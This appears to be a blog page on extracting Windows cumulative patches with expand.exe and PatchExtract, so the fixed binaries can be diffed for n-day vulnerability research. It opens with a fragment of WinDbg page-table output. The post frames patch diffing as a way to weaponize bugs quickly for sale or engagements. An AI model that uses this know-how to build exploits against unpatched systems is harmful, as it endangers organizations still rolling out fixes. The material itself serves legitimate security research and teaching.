   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1
1: kd> dt -p nt!_MMPTE_HARDWARE @@(0x00000000bd6de7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1
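The address in the "Memory read error" line is exactly what you get by sign extending the low 32 bits of the input. A small Python sketch of that arithmetic (the function names are hypothetical, and this only models the symptom, not WinDbg's actual parsing code):

```python
def sign_extend_32(value):
    """Sign extend the low 32 bits of value to 64 bits."""
    low = value & 0xFFFFFFFF
    if low & 0x80000000:              # bit 31 set: upper half fills with ones
        return low | 0xFFFFFFFF00000000
    return low


def needs_wrapping(address):
    """True for addresses that fit in 32 bits and have bit 31 set."""
    return address <= 0xFFFFFFFF and bool(address & 0x80000000)


print(hex(sign_extend_32(0xBD6DE7F8)))   # the address from the failing command
print(needs_wrapping(0xBD6DE7F8))
print(needs_wrapping(0x3F8EA000))
```

Any physical address below 4 GB with bit 31 set should hit the same problem, so those are the ones worth wrapping in @@C++() or @@().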

Other resources I didn't find a place for but still wanted to include

Extracting and Diffing Windows Patches in 2020

It's been a while since I've posted anything here! After all, what are personal blogs for but ignoring for years at a time ;)
Anyhow, I've been running through this demo when teaching SANS SEC760 and I thought I'd write it up so that researchers can come back to it later when they need it. It's also useful to document all of this stuff in one place, since the information about it seems scattered throughout the internet, as many Windows topics are.

So why should you care about extracting and analyzing Windows patches? Doesn't the patch mean the bugs being fixed are now useless?

[[more]]

To start thinking about how to answer those questions, think about how long it takes for even a well running organization with proper patch management to roll out patches to devices. If you, the security researcher, can weaponize a bug within a few weeks of a patch being released, then you may be able to sell it or use it in engagements. Finding bugs is hard, but n-day research tells you pretty much exactly where the bugs are! This is good news. Looking at how patches are implemented and where bugs are fixed can also be useful in discovering 0-days. Over the years, Microsoft has had to fix the same (or very similar) bugs in multiple places. A classic example is the old MS07-017 animated cursor bug that was actually a repeat of the same exact bug from two years prior (MS05-002), just one function cross-reference away. Additionally, Microsoft may not fix the vulnerability at all, or the fix may not be complete, as was the case with the Print Spooler bugs that were found this year, dubbed PrintDemon by Ionescu and Shafir. The original CVE is CVE-2020-1048 and is credited to Peleg Hadar and Tomer Bar over at SafeBreach Labs. After the fix, Ionescu was credited with CVE-2020-1337, which still allowed the creation of malicious ports through a Time Of Check Time Of Use (TOC/TOU) bug, slightly detailed here. All of this just to say: yes, it is worth looking at patches. Looking at patches can also help you find new features that have yet to be thoroughly torn apart by researchers, which are prime targets for vulnerability research.

Obtaining Patches and the Windows Patch Packaging Formats

To be able to rip apart a patch you'll first need to understand what format patches come in and how to get them. You might actually be vaguely familiar with the file formats used to package a patch: .MSU (Microsoft Standalone Update) and .CAB (Cabinet). All patches are distributed as part of Windows Update on your device, but you can also still download standalone patches from the Microsoft Update Catalog. For this post I'm going to be tearing apart patches for Windows 10 1903 x64. A long time ago Microsoft established the second Tuesday of every month as Patch Tuesday, so that patch managers could always know when to expect fixes. For the most part they stick to releasing updates on Patch Tuesday, with the occasional emergency patch for very severe bugs. Microsoft used to provide sequential update packages that had to be installed in order. These days, updates are provided as cumulative, meaning that all of the required updates from the base version (.1) are included in the package. This can make for some pretty large updates! To make things a bit more complicated, many of the updates are distributed as deltas, which we will talk about in depth later in this post.

Effectively Browsing the Microsoft Update Catalog

Luckily, the Microsoft Update Catalog has a pretty good search feature. The most effective way to search for the update you want is to search in the following format:

YYYY-MM release-number (x86|x64|ARM64) cumulative

So for example, if I am looking for the July 2020 patch set for Windows 10 1903 x64 I would search 2020-07 1903 x64 cumulative and one of the top hits should be the result I'm looking for.
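If you end up doing this every month, the search string is easy to generate. A minimal Python sketch (catalog_query is a hypothetical helper, and it only builds the text you would paste into the catalog's search box, it does not talk to the site):

```python
def catalog_query(year, month, release, arch="x64", cumulative=True):
    """Build a search string in the YYYY-MM release-number arch [cumulative] format."""
    if arch not in ("x86", "x64", "ARM64"):
        raise ValueError(f"unexpected architecture: {arch}")
    if not 1 <= month <= 12:
        raise ValueError(f"month out of range: {month}")
    parts = [f"{year:04d}-{month:02d}", str(release), arch]
    if cumulative:
        parts.append("cumulative")
    return " ".join(parts)


print(catalog_query(2020, 7, 1903))
print(catalog_query(2020, 8, 1903, arch="ARM64"))
```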

Searching for an update
Relevant results are easy to get with the right search!

As you can see, results were returned for a few different release numbers (1903, 1909, and 2004) and both Windows 10 and Windows Server. The keen observer should note that the Windows Server and Windows 10 updates are the exact same size. In fact, if you click download, both links direct to the same place. Additionally, updates for 1903 and 1909 are also the same. The latter case reason is explained on the OS build page:

Windows 10, versions 1903 and 1909 share a common core operating system and an identical set of system files. As a result, the new features in Windows 10, version 1909 were included in the recent monthly quality update for Windows 10, version 1903 (released October 8, 2019), but are currently in a dormant state. These new features will remain dormant until they are turned on using an enablement package, which is a small, quick-to-install “master switch” that simply activates the Windows 10, version 1909 features.

Dynamic and Servicing Stack Updates

Microsoft also distributes a few other kinds of updates via the Microsoft Update Catalog. If you leave off the word cumulative from the search above, then you get some more results, including Dynamic and Servicing Stack updates that are considerably smaller than the cumulative updates.

Update variations
Different Kinds of Updates

According to Microsoft documentation, servicing stack updates are updates to the Windows Update process itself. Servicing stack updates are packaged like cumulative updates and only include components related to Windows Update.

Microsoft documentation saves the day again for dynamic updates, which apparently can also update Windows Update components, as well as setup components like installation media, Windows Recovery Environment (WinRE), and some drivers. Dynamic updates are packaged slightly differently than cumulative and servicing stack updates; they are downloadable as a single CAB file and have various language packs and other setup components.

Extracting a Patch

Patches are packed tightly into an MSU file, which can contain tens of thousands of files, only some of which matter to us as security researchers. I wanted to walk through manual extraction first and then provide an update to an existing script (PatchExtract.ps1) to automatically extract and sort a given patch.

Manual Extraction

To get started, you'll need to download a cumulative update MSU file from the update catalog. For this example I'm using the Windows 10 1903 x64 August 2020 cumulative update package. I usually make a few folders before I start: I name the top-level folder with the patch year and month and then create two sub-folders called patch and ext. The actual patch files inside of the nested CAB file will go in the patch folder, and the contents of the extracted MSU will go in the ext folder.

mkdir 2020-08
mv ".\windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu" .\2020-08\
cd .\2020-08\
mkdir ext
mkdir patch

Next, I'm going to expand the MSU using the expand.exe command. The arguments for expand can be listed using the /? flag. For our purposes we will be extracting every file, so we will use -F:*. If you only want certain kinds of files (CABs, DLLs, EXEs, etc.) then you can narrow the pattern passed to the -F flag. The next two arguments are the MSU to extract and then the destination folder for the expanded files.

expand.exe -F:* ".\windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu" .\ext\

Finally, I'm going to extract the patch files from the PSFX cab file by using the expand command again, this time expanding to the patch directory.

expand.exe -F:* ".\ext\Windows10.0-KB4565351-x64_PSFX.cab" .\patch\ | Out-Null

At this point I recommend walking away, starting a load of laundry, getting a sandwich, and petting the cat, because this part takes a while (10-20 minutes). The Out-Null is optional; I only use it because I don't care to see every file printed as it is extracted. This particular extraction took about 15 minutes (via Measure-Command) and resulted in a total of 78898 files and folders under the patch folder!
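The same two expand.exe steps can be scripted. Below is a rough Python sketch that only uses the -F:* form of the command shown above. The function names are hypothetical, and extract_msu has to run on Windows since it shells out to expand.exe. This is not the PatchExtract.ps1 script, just the manual steps strung together.

```python
import ntpath
import os
import subprocess


def expand_command(archive, dest, pattern="*"):
    """Build the expand.exe argument list for one archive."""
    return ["expand.exe", f"-F:{pattern}", archive, dest]


def extract_msu(msu, psfx_cab_name, ext_dir=r".\ext", patch_dir=r".\patch"):
    """Expand the MSU into ext_dir, then the nested PSFX CAB into patch_dir."""
    for folder in (ext_dir, patch_dir):
        os.makedirs(folder, exist_ok=True)
    # Output is discarded, like piping to Out-Null.
    subprocess.run(expand_command(msu, ext_dir), check=True,
                   stdout=subprocess.DEVNULL)
    cab = ntpath.join(ext_dir, psfx_cab_name)
    subprocess.run(expand_command(cab, patch_dir), check=True,
                   stdout=subprocess.DEVNULL)


# Example call (Windows only, takes a long time):
# extract_msu(r".\windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu",
#             "Windows10.0-KB4565351-x64_PSFX.cab")
print(expand_command(r".\ext\Windows10.0-KB4565351-x64_PSFX.cab", ".\\patch\\"))
```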

If you're following along at home:
Once the extraction is complete, give yourself a high-five, and then take it back, because unfortunately that was the easy part!

Next, you'll have to make sense of the extracted files and find the patched files you are looking for.

Making Sense of the Extracted Files

To find what you are looking for it helps to know the structure of the patch and the types of files you will encounter.

To begin to understand these details, take a look at this hierarchical view of a patch starting with the MSU (output abbreviated to save space):

windows10.0-kb4565351-x64_e4f46f54ab78b4dd2dcef193ed573737661e5a10.msu
├── WSUSSCAN.cab
├── Windows10.0-KB4565351-x64-pkgProperties_PSFX.txt
├── Windows10.0-KB4565351-x64_PSFX.xml
└── Windows10.0-KB4565351-x64_PSFX.cab
    ├── amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.18362.1016_none_e013babca5ee7b0b
    │   └── gdiplus.dll
    ├── amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad
    │   ├── f
    │   │   └── ntoskrnl.exe
    │   └── r
    │       └── ntoskrnl.exe
    ├── msil_microsoft.hyperv.powershell.cmdlets_31bf3856ad364e35_10.0.18362.959_none_a7668eee2055cacf
    │   ├── f
    │   │   └── microsoft.hyperv.powershell.cmdlets.dll
    │   └── r
    │       └── microsoft.hyperv.powershell.cmdlets.dll
    ├── wow64_microsoft-windows-p..ting-spooler-client_31bf3856ad364e35_10.0.18362.693_none_f3229700ded2ae02
    │   ├── f
    │   │   └── winspool.drv
    │   └── r
    │       └── winspool.drv
    ├── x86_microsoft-windows-win32calc.resources_31bf3856ad364e35_10.0.18362.387_ar-sa_38566bf3d86fbe5c
    │   ├── f
    │   │   └── win32calc.exe.mui
    │   └── r
    │       └── win32calc.exe.mui
    ├── amd64_windows-shield-provider_31bf3856ad364e35_10.0.18362.900_none_fbf40d7d5ed8b490
    │   ├── f
    │   │   ├── featuretoastbulldogimg.png
    │   │   ├── securityhealthagent.dll
    │   │   ├── securityhealthhost.exe
    │   │   ├── securityhealthproxystub.dll
    │   │   ├── securityhealthservice.exe
    │   │   ├── windowsdefendersecuritycenter.admx
    │   │   └── windowssecurityicon.png
    │   ├── n
    │   │   └── featuretoastdlpimg.png
    │   └── r
    │       ├── featuretoastbulldogimg.png
    │       ├── securityhealthagent.dll
    │       ├── securityhealthhost.exe
    │       ├── securityhealthproxystub.dll
    │       ├── securityhealthservice.exe
    │       ├── windowsdefendersecuritycenter.admx
    │       └── windowssecurityicon.png
    ├── microsoft-windows-kernel-feature-package~31bf3856ad364e35~amd64~~10.0.18362.1016.cat
    ├── microsoft-windows-kernel-feature-package~31bf3856ad364e35~amd64~~10.0.18362.1016.mum
    ├── amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad.manifest
    ├── amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.18362.1016_none_e013babca5ee7b0b.manifest
    ├── msil_microsoft.hyperv.powershell.cmdlets_31bf3856ad364e35_10.0.18362.959_none_a7668eee2055cacf.manifest
    ├── wow64_microsoft-windows-p..ting-spooler-client_31bf3856ad364e35_10.0.18362.693_none_f3229700ded2ae02.manifest
    ├── amd64_windows-shield-provider_31bf3856ad364e35_10.0.18362.900_none_fbf40d7d5ed8b490.manifest
    └── x86_microsoft-windows-win32calc.resources_31bf3856ad364e35_10.0.18362.387_ar-sa_38566bf3d86fbe5c.manifest

As you can see above there are a number of different file formats and folder types:

  • Folder Types
    • Platforms - all folders in the update will be prefixed with one of these
      • amd64 - 64-bit x86
      • x86 - 32-bit x86
      • wow64 - Windows (32-bit) On Windows 64-bit
      • msil - Microsoft Intermediate Language (.NET)
    • Differential Folders
      • n - Null differentials
      • r - Reverse differentials
      • f - Forward differentials
  • File Types
    • manifest - (nearly) 1-1 paired with a platform folder, these are Windows Side-by-Side (WinSxS) manifests
    • cat - security catalog
    • mum - 1-1 paired with a .cat file and contains metadata about the part of the update package that the security catalog applies to

The platform folders and manifests actually have to do with WinSxS, as the system may store multiple versions of a binary in the C:\Windows\WinSxS folder, along with differential files. Take note of the fact that there are more than just EXEs and DLLs in these folders. There are PNG and MUI files as well. Any kind of file can be updated via Windows Update and WinSxS. Some folder names have been truncated; it seems that the maximum folder name length is 100 characters, with extra characters in the middle being replaced with two dots (as in p..ting-spooler-client above).
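Since the folder names follow a regular pattern, they are easy to split apart when sorting an extracted patch. Here's a minimal Python sketch. The field names are my own labels: the token and version match the publicKeyToken and version attributes seen in the manifests, "language" is a guess based on values like none and ar-sa, and the trailing value is treated as an opaque suffix.

```python
from collections import namedtuple

Component = namedtuple(
    "Component", "platform name public_key_token version language suffix")


def parse_component_folder(folder):
    """Split a platform folder (or .manifest file) name into its parts."""
    if folder.endswith(".manifest"):
        folder = folder[:-len(".manifest")]
    # The last four fields are fixed, so split from the right; the component
    # name itself may be truncated with ".." but is kept as-is.
    head, token, version, language, suffix = folder.rsplit("_", 4)
    platform, name = head.split("_", 1)
    return Component(platform, name, token, version, language, suffix)


kernel = parse_component_folder(
    "amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad")
print(kernel.platform, kernel.name, kernel.version)
```

Grouping parsed folders by name and sorting by version is one way to find the newest copy of a binary inside the patch.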

For purposes of this post, I'm going to leave .mum and .cat files alone, since they are essentially just metadata and signature validation information.

WinSxS Manifests

The .manifest files in the patch describe how the patch is to be applied, the files that are part of the patch, the expected result of the patch in the form of file hashes, permissions of the resulting files, registry keys to set, and more. They define the effects that happen to the system other than replacing the file that is being updated.
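Manifests are plain XML, so the file list and expected hashes can be pulled out with a few lines of Python. The sketch below runs against a trimmed-down fragment with the same element names and namespaces as a real manifest from this patch. The helper name list_files is hypothetical, and real manifests carry many more elements than this handles.

```python
import base64
import xml.etree.ElementTree as ET

# Trimmed fragment in the shape of a WinSxS manifest (one file entry only).
SAMPLE = r"""
<assembly xmlns="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
  <file name="XblGameSave.dll" destinationPath="$(runtime.system32)\">
    <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2"
                xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
      <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
      <dsig:DigestValue>VjbzeELS2YXIwIhHo5f2hQm+pWTzHY8wo7dFxzfkbtA=</dsig:DigestValue>
    </asmv2:hash>
  </file>
</assembly>
"""

NS = {
    "asm3": "urn:schemas-microsoft-com:asm.v3",
    "asm2": "urn:schemas-microsoft-com:asm.v2",
    "dsig": "http://www.w3.org/2000/09/xmldsig#",
}


def list_files(manifest_xml):
    """Return (file name, destination path, digest as hex) for each <file>."""
    root = ET.fromstring(manifest_xml)
    results = []
    for entry in root.findall("asm3:file", NS):
        digest = entry.find("asm2:hash/dsig:DigestValue", NS)
        # The digest is base64 in the manifest; hex is easier to compare
        # against the output of common hashing tools.
        hex_digest = base64.b64decode(digest.text).hex() if digest is not None else None
        results.append((entry.get("name"), entry.get("destinationPath"), hex_digest))
    return results


for name, dest, digest in list_files(SAMPLE):
    print(name, dest, digest)
```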

Here is an example manifest for the Windows-Gaming-XboxLive-Storage-Service-Component, whatever that is.

amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.18362.836_none_a949879e457dbcd4.manifest
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0" copyright="Copyright (c) Microsoft Corporation. All Rights Reserved.">
  <assemblyIdentity name="Windows-Gaming-XboxLive-Storage-Service-Component" version="10.0.18362.836" processorArchitecture="amd64" language="neutral" buildType="release" publicKeyToken="31bf3856ad364e35" versionScope="nonSxS" />
  <dependency discoverable="no" resourceType="resources">
    <dependentAssembly>
      <assemblyIdentity name="Windows-Gaming-XboxLive-Storage-Service-Component.Resources" version="10.0.18362.836" processorArchitecture="amd64" language="*" buildType="release" publicKeyToken="31bf3856ad364e35" />
    </dependentAssembly>
  </dependency>
  <file name="XblGameSave.dll" destinationPath="$(runtime.system32)\" sourceName="XblGameSave.dll" importPath="$(build.nttree)\" sourcePath=".\">
    <securityDescriptor name="WRP_FILE_DEFAULT_SDDL" />
    <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
      <dsig:Transforms>
        <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
      </dsig:Transforms>
      <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
      <dsig:DigestValue>VjbzeELS2YXIwIhHo5f2hQm+pWTzHY8wo7dFxzfkbtA=</dsig:DigestValue>
    </asmv2:hash>
  </file>
  <file name="XblGameSaveTask.exe" destinationPath="$(runtime.system32)\" sourceName="" importPath="$(build.nttree)\">
    <securityDescriptor name="WRP_FILE_DEFAULT_SDDL" />
    <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
      <dsig:Transforms>
        <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
      </dsig:Transforms>
      <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
      <dsig:DigestValue>Ez9Rg7QMg26whoQcakH4i15oeH1NOZgbybxRdPMoi8Q=</dsig:DigestValue>
    </asmv2:hash>
  </file>
  <memberships>
    <categoryMembership>
      <id name="Microsoft.Windows.Categories.Services" version="10.0.18362.836" publicKeyToken="31bf3856ad364e35" typeName="Service" />
      <categoryInstance subcategory="XblGameSave">
        <serviceData name="XblGameSave" displayName="@%systemroot%\system32\XblGameSave.dll,-100" errorControl="normal" start="demand" type="win32ShareProcess" description="@%systemroot%\system32\XblGameSave.dll,-101" dependOnService="UserManager,XblAuthManager" imagePath="%SystemRoot%\system32\svchost.exe -k netsvcs -p" objectName="LocalSystem">
          <failureActions resetPeriod="86400">
            <actions>
              <action delay="10000" type="restartService" />
              <action delay="10000" type="restartService" />
              <action delay="10000" type="restartService" />
              <action delay="0" type="none" />
            </actions>
          </failureActions>
          <serviceTrigger action="start" subtype="RPC_INTERFACE_EVENT" type="NetworkEndpointEvent">
            <triggerData type="string" value="F6C98708-C7B8-4919-887C-2CE66E78B9A0" />
          </serviceTrigger>
        </serviceData>
      </categoryInstance>
    </categoryMembership>
    <categoryMembership>
      <id name="Microsoft.Windows.Categories" version="1.0.0.0" publicKeyToken="365143bb27e7ac8b" typeName="BootRecovery" />
    </categoryMembership>
    <categoryMembership>
      <id name="Microsoft.Windows.Categories" version="1.0.0.0" publicKeyToken="365143bb27e7ac8b" typeName="SvcHost" />
      <categoryInstance subcategory="netsvcs">
        <serviceGroup position="last" serviceName="XblGameSave" />
      </categoryInstance>
    </categoryMembership>
  </memberships>
  <taskScheduler>
    <Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
      <RegistrationInfo>
        <Author>Microsoft</Author>
        <Description>XblGameSave Standby Task</Description>
        <URI>\Microsoft\XblGameSave\XblGameSaveTask</URI>
      </RegistrationInfo>
      <Principals>
        <Principal id="LocalSystem">
          <UserId>S-1-5-18</UserId>
        </Principal>
      </Principals>
      <Triggers>
        <IdleTrigger id="XblGameSave Check on CS Entry">
          <Enabled>false</Enabled>
        </IdleTrigger>
      </Triggers>
      <Settings>
        <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
        <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
        <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
        <AllowHardTerminate>true</AllowHardTerminate>
        <StartWhenAvailable>false</StartWhenAvailable>
        <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
        <AllowStartOnDemand>true</AllowStartOnDemand>
        <Enabled>true</Enabled>
        <Hidden>false</Hidden>
        <RunOnlyIfIdle>true</RunOnlyIfIdle>
        <WakeToRun>false</WakeToRun>
        <ExecutionTimeLimit>PT2H</ExecutionTimeLimit>
        <Priority>7</Priority>
      </Settings>
      <Actions Context="LocalSystem">
        <Exec>
          <Command>%windir%\System32\XblGameSaveTask.exe</Command>
          <Arguments>standby</Arguments>
        </Exec>
      </Actions>
    </Task>
  </taskScheduler>
  <registryKeys>
    <registryKey keyName="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ubpm">
      <registryValue name="CriticalTask_XblGameSaveTask" valueType="REG_SZ" value="NT TASK\Microsoft\XblGameSave\XblGameSaveTask" />
      <registryValue name="CriticalTask_XblGameSaveTaskLogon" valueType="REG_SZ" value="NT TASK\Microsoft\XblGameSave\XblGameSaveTaskLogon" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_CLASSES_ROOT\AppId\{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}">
      <registryValue name="" valueType="REG_SZ" value="Xbox Live Game Saves" />
      <registryValue name="LocalService" valueType="REG_SZ" value="XblGameSave" />
      <registryValue name="AccessPermission" valueType="REG_BINARY" value="010014806400000070000000140000003000000002001c000100000011001400040000000101000000000010001000000200340002000000000018001f000000010200000000000f0200000001000000000014001f00000001010000000000010000000001010000000000050a00000001020000000000052000000021020000" />
      <registryValue name="LaunchPermission" valueType="REG_BINARY" value="010014806400000070000000140000003000000002001c000100000011001400040000000101000000000010001000000200340002000000000018001f000000010200000000000f0200000001000000000014001f00000001010000000000010000000001010000000000050a00000001020000000000052000000021020000" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\XblGameSave\Parameters">
      <registryValue name="ServiceDll" valueType="REG_EXPAND_SZ" value="%SystemRoot%\System32\XblGameSave.dll" />
      <registryValue name="ServiceDllUnloadOnStop" valueType="REG_DWORD" value="0x00000001" />
      <registryValue name="ServiceIdleTimeout" valueType="REG_DWORD" value="0x00000258" />
    </registryKey>
    <registryKey keyName="HKEY_CLASSES_ROOT\CLSID\{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}\">
      <registryValue name="AppId" valueType="REG_SZ" value="{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\AllowedCOMCLSIDs\{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}\" />
    <registryKey keyName="HKEY_CLASSES_ROOT\CLSID\{5B3E6773-3A99-4A3D-8096-7765DD11785C}\">
      <registryValue name="AppId" valueType="REG_SZ" value="{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}" />
      <securityDescriptor name="WRP_REGKEY_DEFAULT_SDDL" />
    </registryKey>
    <registryKey keyName="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\AllowedCOMCLSIDs\{5B3E6773-3A99-4A3D-8096-7765DD11785C}\" />
  </registryKeys>
  <localization>
    <resources culture="en-US">
      <stringTable>
        <string id="displayName" value="XblGameSave" />
        <string id="description" value="XblGameSave service" />
      </stringTable>
    </resources>
  </localization>
  <trustInfo>
    <security>
      <accessControl>
        <securityDescriptorDefinitions>
          <securityDescriptorDefinition name="WRP_REGKEY_DEFAULT_SDDL" sddl="O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:P(A;CI;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CI;GR;;;SY)(A;CI;GR;;;BA)(A;CI;GR;;;BU)(A;CI;GR;;;S-1-15-2-1)(A;CI;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)" operationHint="replace" />
          <securityDescriptorDefinition name="WRP_FILE_DEFAULT_SDDL" sddl="O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:P(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;GRGX;;;BA)(A;;GRGX;;;SY)(A;;GRGX;;;BU)(A;;GRGX;;;S-1-15-2-1)(A;;GRGX;;;S-1-15-2-2)S:(AU;FASA;0x000D0116;;;WD)" operationHint="replace" />
        </securityDescriptorDefinitions>
      </accessControl>
    </security>
  </trustInfo>
</assembly>

Notice all of the different fields. There are fields to modify registry keys, change file permissions, the files to patch and their resulting hashes, services to modify or change the state of, scheduled tasks to add or change, and more!
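If you'd rather not read the XML by eye, the file list and expected hashes can be pulled out with a few lines of python. This is only a minimal sketch: the function name and the trimmed-down SAMPLE manifest are my own illustration, and it assumes the manifest uses the asm.v3 and xmldsig namespaces shown in the example above.

```python
import xml.etree.ElementTree as ET

# Namespaces as they appear in the example manifest.
ASM_V3 = "urn:schemas-microsoft-com:asm.v3"
DSIG = "http://www.w3.org/2000/09/xmldsig#"


def list_manifest_files(manifest_xml):
    """Return (name, destinationPath, base64 digest) for every <file> element.

    manifest_xml may be str or bytes. The digest is None when a <file>
    element carries no DigestValue.
    """
    root = ET.fromstring(manifest_xml)
    results = []
    for file_elem in root.iter(f"{{{ASM_V3}}}file"):
        digest = file_elem.find(f".//{{{DSIG}}}DigestValue")
        results.append((
            file_elem.get("name"),
            file_elem.get("destinationPath"),
            digest.text if digest is not None else None,
        ))
    return results


# Hypothetical, heavily trimmed version of the manifest above.
SAMPLE = """<assembly xmlns="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
  <file name="XblGameSave.dll" destinationPath="$(runtime.system32)\\" sourceName="XblGameSave.dll">
    <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
      <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
      <dsig:DigestValue>VjbzeELS2YXIwIhHo5f2hQm+pWTzHY8wo7dFxzfkbtA=</dsig:DigestValue>
    </asmv2:hash>
  </file>
</assembly>"""

if __name__ == "__main__":
    for name, dest, digest in list_manifest_files(SAMPLE):
        print(name, dest, digest)
```

For a real manifest, read the file in binary mode and pass the bytes straight in so the XML declaration's encoding is honored.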

If you look inside the corresponding platform folder that this manifest describes, you will find the files that it is referring to, either as full files or (in this case) differentials:

PS > ls -Recurse amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.18362.836_none_a949879e457dbcd4


    Directory: C:\Users\wumb0\Desktop\patches\2020-08\patch\amd64_windows-gaming-xbox..e-service-component_31bf3856ad36
    4e35_10.0.18362.836_none_a949879e457dbcd4


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/23/2020   6:50 PM                f
d-----         8/23/2020   6:50 PM                r


    Directory: C:\Users\wumb0\Desktop\patches\2020-08\patch\amd64_windows-gaming-xbox..e-service-component_31bf3856ad36
    4e35_10.0.18362.836_none_a949879e457dbcd4\f


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2020   5:10 AM          35111 xblgamesave.dll
-a----          8/6/2020   5:10 AM            237 xblgamesavetask.exe


    Directory: C:\Users\wumb0\Desktop\patches\2020-08\patch\amd64_windows-gaming-xbox..e-service-component_31bf3856ad36
    4e35_10.0.18362.836_none_a949879e457dbcd4\r


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2020   5:10 AM          35200 xblgamesave.dll
-a----          8/6/2020   5:10 AM            237 xblgamesavetask.exe

Automating Patch Extraction

Now that you know a bit about the structure of a patch and how to extract the files from one, it's time to introduce some automation into the mix. Greg Linares (@laughing_mantis) is the author of PatchExtract, a tool to automagically extract and organize a Microsoft patch. He also created a tool called PatchClean, but I am unsure if it still works with modern patches, so use at your own peril! I have slightly modified PatchExtract to fix some PowerShell issues and to quiet the output of the script. Be aware that it uses IEX on a user input string now, so be careful :).

PatchExtract.ps1

To use, specify the path to the PATCH and the output PATH for the resulting files. PatchExtract will extract the MSU, find the PSFX CAB, extract its contents, and sort the extracted patch into various folders:

PS > ls X:\Patches\x64\1903\2019\9


    Directory: X:\Patches\x64\1903\2019\9


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
da----         11/9/2019   6:30 PM                JUNK
da----         11/9/2019   6:30 PM                MSIL
da----         11/9/2019   6:32 PM                PATCH
da----         11/9/2019   6:31 PM                WOW64
da----         11/9/2019   7:06 PM                x64
da----         11/9/2019   6:31 PM                x86
-a----          9/8/2019  12:28 PM            517 Windows10.0-KB4515384-x64-pkgProperties_PSFX.txt

